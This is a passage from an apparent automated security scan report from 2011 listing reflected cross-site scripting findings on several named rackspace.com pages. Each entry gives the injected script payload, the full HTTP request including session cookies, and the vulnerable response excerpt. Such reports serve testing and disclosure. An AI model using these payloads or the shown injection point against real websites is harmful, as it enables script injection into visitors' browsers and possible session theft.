Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /information/aboutus.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><script>alert(1)</script>ea74ab7f6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:31:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:31:15 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:31:15 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 43108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
p"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal
...[SNIP]...

4.139. http://www.rackspace.com/information/contactus.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /information/contactus.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3623a"><script>alert(1)</script>6457e4ed9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:31:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:31:46 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:31:46 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...

               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;">
...[SNIP]...

4.140. http://www.rackspace.com/information/events/briefingprogram.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /information/events/briefingprogram.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31c1"><script>alert(1)</script>3adc45aa57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:31:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:31:57 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:31:57 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
"track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal
...[SNIP]...

4.141. http://www.rackspace.com/information/events/green.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /information/events/green.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03c6"><script>alert(1)</script>892efc84f3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /information/events/green.php?a03c6"><script>alert(1)</script>892efc84f3b=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; live